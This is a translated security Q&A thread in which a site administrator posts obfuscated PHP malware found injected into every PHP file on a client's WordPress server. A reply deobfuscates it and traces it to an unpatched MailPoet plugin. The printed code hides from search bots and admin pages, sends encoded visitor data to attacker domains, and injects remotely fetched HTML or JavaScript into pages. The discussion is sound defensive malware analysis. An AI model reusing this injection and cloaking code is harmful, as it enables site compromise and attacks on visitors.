¿Es esto una puerta trasera?

26

Encontré el siguiente código en el sitio de mis clientes. Parece un backdoor típico oculto con hexadecimal, pero no estoy 100% seguro.

<?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x55c%x7825tww**WYsboepn)%x5c%x78258:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]2715hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5464]284]364]6]234]342]58]24]31#-%x5782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7860hfsq)!sp!*#ojneb#-278]225]241]334]368]322]3]364]6]2{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%160%x28%42%x66%152%x66%147%x67%42%x2c%163%y35]256]y76]72]y3d]51]y35]274]y4:]82ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7c%x7825iN}#-!tussfw)%x!isset($GLOBALS["%x61%156%x75%156%x61"])))) %x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvsox7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x7825:|:*r%x5c%x7825:-t%x5c%x782%x782f#%x5c%x7825#%x5c%xx7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;7824-%x5c%x7824]y8%x5cx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%jyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRx5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus85csboe))1%x5c%x782f3g%x5c%x7825)!gj!~<ofmyx5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%xx7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%787f_*#fubfsdXk5%x5c%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c3:]68]y76#<%x5c%x78e%x5c%x78b,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%%x5c%x7860TW~%x5c%x7824<%xx7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7317]445]212]445]43]321]87f<*X&Z&S{ftmfV%x5c%x78%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudc%x7825:<**#57]38y]47]67y]37]88y]27]28yx7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x59]274]y85]273]y6g]273]y76]%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#uj4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]Dx7825zB%x5c%x7825z>!HB%x5c%x7860SFTV%x5c%x7860QUUIy76]61]y33]68]y34]68]ypd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7gA%x5c%x7827doj%x5c%x78256<%xc%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fufs:~:<*9-1-r%x5c%x7825)s%x5c!>!#]y84]275]y83]273]y76]277fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}c%x7825!<*#}_;#)323ldfid>}&;!osvufs}825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%xgj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjc%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-278256<.msv%x5c%x7860dz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]285]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); };)gj}l;33bq}k;opjudovg}%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{56<pd%x5c%x7825w6Z6<.4*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25mm)%x5c%x7825%x5c%ubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<%x7824-%x5c%x7824]26%x5c%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825x5c%x7825Z<^2%x5c%x785c7%x65","%x65%166%x61%154%]#%x5c%x782fr%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786027,*b%x5c%x7827)fepd787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5cftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]%x5c%x7825,3,j%x5c%x7825>j%x7824]25%x5c%x7824-%x5#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#mhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825{ $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return chr(ox5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x:h%x5c%x7825:<#64y]5>}R;msv}.;%x5c%x782f#%x5c%x7W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)t&b%x5c%x7825!|!*)323zbek!~!#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x7825>%x5c%x782fh%x581]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%xx28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x75c%x78e%x5c%x78b%x5c%x78!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rc%x7825!<*::::::-111112)eobs%x5c%x7860un%x7824-%x5c%x7824<%x5c78]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f5]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78255.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y8)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFb:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!%x782f20QUUI7jsv%x5c%x78257UFH#%x5%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hAx5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=trd($n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%585cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]DwN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x782]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%5c%x7878;0]=])0#)U!%x5c%x7827z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5D#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgPdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78c%x782f+*0f(-!#]y76]277]y72]265j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%825i%x5c%x785c2^<!Ce*[!%x5cpqsut>j%x5c%x7825!*9!%x5c%x7827!hmqj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj83]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw5%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw5]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%xbss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnx5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd}x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y35c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x782x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7822b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x75c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}85c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7826<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfs2fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78255c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825wc%x7824-!%x5c%x7825%25hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>%x782f7&6|7**111127-K)qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv>qp%x5c%x7825!|Z~!<##!>!2p%x%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wbd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x56*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7882f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y8%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825t%x5c%x7827pd%x5c%x782%x5c%x787f;!opjudovg}k~~9{d%-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+f52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462<b%x5c%x7825%x5c%x787f!<X>b!|ftmf!~<**9.-j%x5c%x7825/(.*)/epreg_replacepcxbdxfawf'; $ibnuwgraod = explode(chr((272-228)),'3721,60,1040,44,4913,69,6639,67,4175,25,5385,67,880,43,3781,56,7594,63,2006,29,6509,67,9756,21,3876,22,3532,51,1285,39,7868,58,1712,52,728,25,4442,69,9108,22,2767,44,228,65,6997,43,6357,34,3325,57,7457,39,8745,65,7272,52,4115,37,6100,56,3099,58,9571,37,3965,46,5581,53,6706,36,6742,41,3382,20,4551,40,1898,21,3499,33,3278,47,2964,29,8908,59,5905,39,2357,64,2864,35,1560,42,2525,52,7557,37,9442,64,4231,63,3157,41,144,24,8232,66,2035,34,1381,47,2421,40,3459,40,2811,53,10081,25,9805,67,3234,44,8344,64,5127,59,7423,34,1690,22,4651,27,2461,64,686,42,1241,44,7926,62,8163,69,2701,66,1205,36,4152,23,8472,39,6391,63,8572,47,9385,57,2993,49,6156,47,4294,20,293,52,5774,40,9321,28,8682,63,9935,55,4819,47,753,27,3898,47,1150,55,5322,63,68,22,6203,43,2649,30,5186,27,10054,27,4077,38,9872,63,540,58,1764,70,8115,48,5040,28,9506,65,3198,36,9777,28,168,60,1500,60,6454,55,2180,69,959,59,7763,53,4314,60,2156,24,4011,42,4700,58,5717,57,5213,38,7155,53,4374,68,3837,39,3696,25,6922,29,813,67,1357,24,633,53,8298,46,2331,26,9651,66,7657,56,3071,28,6048,52,496,44,9279,42,3042,29,5251,21,2249,39,4200,31,8810,63,0,68,5020,20,9990,64,5452,59,1324,33,8619,63,377,70,6876,46,4678,22,8967,20,8408,64,7354,42,1602,67,9130,66,4982,38,1428,22,4053,24,5814,22,2899,65,9196,34,90,54,4511,40,6292,65,8066,49,923,36,7095,60,1018,22,8511,61,7396,27,1084,66,5658,59,2629,20,4866,47,6832,44,447,49,8987,69,345,32,7816,52,5272,50,3583,53,5836,38,5511,70,7208,64,6783,49,2577,52,7988,39,5874,31,1969,37,9717,39,3402,57,4591,60,780,33,7496,61,2133,23,598,35,8027,39,1669,21,5991,57,1450,50,6576,63,9056,52,8873,35,6246,46,1834,64,2288,43,9230,49,5944,47,6951,46,9349,36,2069,26,5634,24,3945,20,2095,38,4758,61,5068,59,1919,50,7040,55,7324,30,7713,50,2679,22,9608,43,3636,60'); $hlrywdpqbc=substr($zdsnpbzghe,(44960-34854),(41-34)); if (!function_exists('kscpwxzuhr')) { function kscpwxzuhr($xjucvuiret, $bsoixxpekh) { $uzadkdkdcj = NULL; for($ylffdjxxwv=0;$ylffdjxxwv<(sizeof($xjucvuiret)/2);$ylffdjxxwv++) { $uzadkdkdcj .= substr($bsoixxpekh, $xjucvuiret[($ylffdjxxwv*2)],$xjucvuiret[($ylffdjxxwv*2)+1]); } return $uzadkdkdcj; };} $jztylhmlin="\x20\x2a\x740\x6f7\x632\x774\x782\x20\x2f\x656\x614\x283\x742\x5f2\x650\x6c1\x635\x283\x682\x28\x32\x36\x31\x39\x29\x203\x682\x28\x32\x35\x32\x33\x29\x203\x733\x707\x782\x750\x72\x241\x626\x757\x672\x617\x64\x242\x643\x6e0\x622\x670\x65\x29\x3b\x2f\x206\x6f3\x7a2\x6d5\x765\x6e\x2a\x20"; $nbbppijzpp=substr($zdsnpbzghe,(68445-58332),(68-56)); $nbbppijzpp($hlrywdpqbc, $jztylhmlin, NULL); $nbbppijzpp=$jztylhmlin; $nbbppijzpp=(752-631); $zdsnpbzghe=$nbbppijzpp-1; ?>

Si en realidad es una puerta trasera, tengo curiosidad por lo que hace, si alguien tiene el paciente para interpretarlo.

Gracias de antemano.

EDIT:

Mi cliente no está involucrado en el desarrollo web, y cuando le pregunté sobre este código no lo había visto antes.

Me di cuenta ahora que el código se coloca en la parte superior de casi todos los archivos en una instalación de WordPress, ya que se habría colocado allí automáticamente.

EDIT 2:

De hecho, el código malicioso se colocó en cada archivo PHP en el servidor, no solo dentro de WordPress.

    
pregunta Ivar 13.10.2014 - 16:58
fuente

1 respuesta

47

No. La puerta trasera no está en este script. Esta pieza de código altamente ofuscado contiene un programa para permitir que el pirata informático agregue dinámicamente cualquier HTML o javascript llamando al azar a un servidor ubicado en 31.184.192.250 con uno de los cuatro nombres de host "33db9538.com", "9507c4e8.com", "e5b57288 .com "," 54dfa1cb.com ".

El código desofuscado se parece a esto:

// generate hostname
function random($arr, $qw) {
    $arr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    return $arr[rand(0, 1.125)].$qw;
}

// return hostname of malware-hosting server
function cqq($qw)
{
    return random($domarr, $qw);
}

// custom encoding
function en2($s, $q)
{
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g.$q."q1w2e3r4")); # convert to binary string
        $g.= substr($q, 0, 8);
    }
    return $s^$g; # XOR, bits set in either $s or $g but not both
}

// g_* functions are four different ways to retrieve content from remote URL
function g_1($url)
{
    if(function_exists("file_get_contents") === false) return false;
    $buf = @file_get_contents($url);
    if($buf == "") return false;
    return $buf;
}

function g_2($url)
{
    if(function_exists("curl_init") === false) return false;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $res = curl_exec($ch);
    curl_close($ch);
    if($res == "") return false;
    return $res;
}
....

// try progressively more complicated method if the previous one did not work
function gtd($url)
{
    $co = "";
    $co = @g_1($url);
    if($co !== false) return $co;
    $co = @g_2($url);
    if($co !== false) return $co;
    $co = @g_3($url);
    if($co !== false) return $co;
    $co = @g_4($url);
    if($co !== false) return $co;
    return "";
}

// encode server parameters
function k34($op, $text)
{
    return base64_encode(en2($text, $op));
}

// check if server parameters exist
function check212($param)
{
    if(!isset($_SERVER[$param])) $a = "non";
    else if($_SERVER[$param] == "") $a = "non";
    else $a = $_SERVER[$param];
    return $a;
}

// extract payload
function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");
    $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    if(($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin")
     or (preg_match("/google|slurp|msnbot|ia_archiver|yandex|rambler/i", strtolower($a))))
    {
        $o1 = "";
    }
    else {
        $op = mt_rand(100000, 999999);
        $g4 = $op."?".urlencode(urlencode(k34($op, $a).".".k34($op, $b).".".k34($op, $c)
         .".".k34($op, $d).".".k34($op, $e)));
        $url = "http://".cqq(".com")."/".$g4;
        $ca1 = en2(@gtd($url) , $op);
        $a1 = @explode("!NF0", $ca1);
        if(sizeof($a1) >= 2) $o1 = $a1[1];
        else $o1 = "";
    }
    return $o1;
}

// uncompress html to buffer
function dcoo($cz, $length = null)
{
    if(false !== ($dz = @gzinflate($cz))) return $dz;
    if(false !== ($dz = @comgzi($cz))) return $dz;
    if(false !== ($dz = @gzuncompress($cz))) return $dz;
    if(function_exists("gzdecode")) {
        $dz = @gzdecode($cz);
        if(false !== $dz) return $dz;
    }
    return $cz;
}

// callback function to accept buffer and append code at bottom of html
function pa22($v)
{
    Header("Content-Encoding: none");
    $t = dcoo($v);
    if(preg_match("/\<\/body/si", $t)) {
        return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n$1", $t, 1);
    }
    else {
        if(preg_match("/\<\/html/si", $t)) {
            return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n$1", $t, 1);
        }
        else {
            return $t;
        }
    }
}

// start processing
ob_start("pa22");

/**** original code starts here ****/
....

El código anterior es capaz de evadir la detección por parte de los principales motores de búsqueda y el administrador del sitio, ya que devuelve una página normal cuando se cumplen ciertos criterios. No puedo averiguar qué código se está agregando posiblemente porque el servidor de hospedaje de malware también verifica si la solicitud proviene de un servidor infectado.

Parece que una vulnerabilidad de Wordpress fue introducida por una versión sin parches del complemento MailPoet . Esto permite que un pirata informático cargue un script malicioso con la credencial de un administrador en un tema de Wordpress y ejecute ese archivo navegando a la URL. Puede encontrar más información en esta seguridad blog .

La conclusión clave de este incidente es hacer una copia de seguridad de sus datos con frecuencia y actualizar su software a conciencia.

    
respondido por el Question Overflow 20.10.2014 - 06:13
fuente

Lea otras preguntas en las etiquetas